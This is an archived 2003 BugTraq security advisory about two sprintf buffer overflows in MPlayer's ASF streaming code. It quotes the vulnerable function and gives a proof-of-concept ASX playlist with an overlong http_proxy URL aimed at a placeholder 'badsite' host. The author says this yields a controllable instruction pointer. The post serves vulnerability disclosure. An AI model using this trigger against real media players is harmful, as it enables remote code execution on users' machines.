BugTraq
Mplayer Buffer Overflow Sep 26 2003 12:17AM
Otero, Hernan (hernan otero eds com)

Favorite Linux Player Buffer Overflow

Product: Mplayer
Developers: http://www.mplayerhq.hu
OS: Port to All *NIX and Win32
Remote Exploitable: YES

Developers has been contacted, problem was fixed, recomended update your
mplayer version.

In the source tree there is a file called asf_streaming.c this file has a
function named asf_http_request, that function has two buffer overflows,
this overflows are in the sprintf lines.


asf_http_request {
char str[250];
....
...
..
sprintf( str, "Host: %s:%d", server_url->hostname,
server_url->port );
....
...
..
sprintf( str, "Host: %s:%d", url->hostname, url->port );

....
...
..
}

This, at a first look, may look as it can´t be exploited ( because the
MAXHOSTLEN size restriction )... but if in an ASX file like this with a
"badsite" listening in "badport" send "\n\n" as answer you could lead to a
fully controllable EIP buffer overflow


<asx version = "3.0">
<title>Bas Site ASX</title>

<moreinfo href = "mailto:info (at) badsite (dot) com [email concealed]
<mailto:info (at) badsite (dot) com [email concealed]> " />
<logo href = "http://www.badsite.com/streaming/grupo.gif
<http://www.badsite.com/streaming/grupo.gif> " style="ICON" />
<banner href= "images/bannermitre.gif">
<abstract>Bad Site live</abstract>
<moreinfo target="_blank" href = "http://www.badsite.com/
<http://www.badsite.com/> " />
</banner>

<entry>
<title>NEWS</title>
<AUTHOR>NEWS</AUTHOR>
<COPYRIGHT>© All by the news</COPYRIGHT>
<ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaa
aaaaaaaaaaaa"/>
<logo href = "http://www.badsite.com/streaming/grupo.gif
<http://badsite.com/streaming/grupo.gif> " style="ICON" />
</entry>
</asx>

Regards,

Hernán Otero
hernan.otero (at) eds (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus